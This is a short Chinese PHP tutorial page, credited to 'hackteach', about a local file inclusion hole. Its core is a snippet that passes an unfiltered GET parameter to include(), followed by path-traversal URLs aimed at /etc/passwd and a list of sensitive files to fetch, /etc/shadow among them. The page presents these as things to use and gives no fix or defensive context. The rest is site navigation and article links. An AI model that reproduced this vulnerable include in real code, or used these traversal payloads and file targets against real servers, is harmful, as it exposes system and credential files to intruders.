编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

3

Oct 09 PHP

php 对输入信息的进行安全过滤的函数代码

Jun 29 PHP

php实现向javascript传递数组的方法

Jul 27 PHP

PHP中Array相关函数简介

Jul 03 PHP

PHP中检索字符串的方法分析【strstr与substr_count方法】

Feb 17 PHP

深入解析PHP中SESSION反序列化机制

Mar 01 PHP

php显示页码分页类的封装

Jun 08 PHP

利用laravel搭建一个迷你博客实战教程

Aug 13 PHP

深入研究PHP中的preg_replace和代码执行

Aug 15 PHP

laravel实现于语言包的完美切换方法

Sep 29 PHP

phpfpm的作用和用法

Oct 10 PHP

php框架CI（codeigniter）自动加载与自主创建对象操作实例分析

Jun 06 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

检举信(8) 协议书(568) 委托书(259) 担保书(46) 竞聘书(31) 任命书(51) 标语(336) 意向书(73) 公证书(45) 说明书(38)

You might like

php实现的百度搜索某地天气的小偷代码

2014/04/23 PHP

浅谈php+phpStorm+xdebug配置方法

2015/09/17 PHP

PHP使用反射机制实现查找类和方法的所在位置

2016/04/22 PHP

laravel通过创建自定义artisan make命令来新建类文件详解

2017/08/17 PHP

PHP __call()方法实现委托示例

2019/05/20 PHP

JavaScript进阶教程(第四课第一部分)

2007/04/05 Javascript

javascript parseInt与Number函数的区别

2010/01/21 Javascript

javascript中的继承实例代码

2011/04/27 Javascript

JQuery触发radio或checkbox的change事件

2012/12/18 Javascript

JS网页图片按比例自适应缩放实现方法

2014/01/15 Javascript

javascript向后台传送相同属性的参数即数组参数

2014/02/17 Javascript

jqGrid读取选择的多行的某个属性代码

2014/05/18 Javascript

超级给力的JavaScript的React框架入门教程

2015/07/02 Javascript

利用Vue.js指令实现全选功能

2016/09/08 Javascript

koa2 数据api中间件设计模型的实现方法

2020/07/13 Javascript

Python中__init__和__new__的区别详解

2014/07/09 Python

Python代码的打包与发布详解

2014/07/30 Python

python对数组进行反转的方法

2015/05/20 Python

python实现逐个读取txt字符并修改

2018/12/24 Python

python opencv实现图像边缘检测

2019/04/29 Python

使用django的ORM框架按月统计近一年内的数据方法

2019/07/18 Python

docker-py 用Python调用Docker接口的方法

2019/08/30 Python

python装饰器代替set get方法实例

2019/12/19 Python

详解python中的闭包

2020/09/07 Python

Matlab使用Plot函数实现数据动态显示方法总结

2021/02/25 Python

HTML5中indexedDB 数据库的使用实例

2017/05/11 HTML / CSS

Nice Kicks网上商店：ShopNiceKicks.com

2018/12/25 全球购物

Ruby中的保护方法和私有方法与一般面向对象程序设计语言的一样吗

2013/05/01 面试题

党校培训思想汇报

2013/12/30 职场文书

三严三实对照检查材料

2014/08/25 职场文书

立志成才演讲稿

2014/09/04 职场文书

报到证办理个人委托书

2014/10/06 职场文书

2014年教育实习工作总结

2014/11/22 职场文书

CSS的class与id常用的命名规则

2021/05/18 HTML / CSS

BCL经典机 SONY ICF-5900W电路分析

2022/04/24 无线电

win11自动弹出虚拟键盘怎么关闭? Win11关闭虚拟键盘的技巧

2023/01/09 数码科技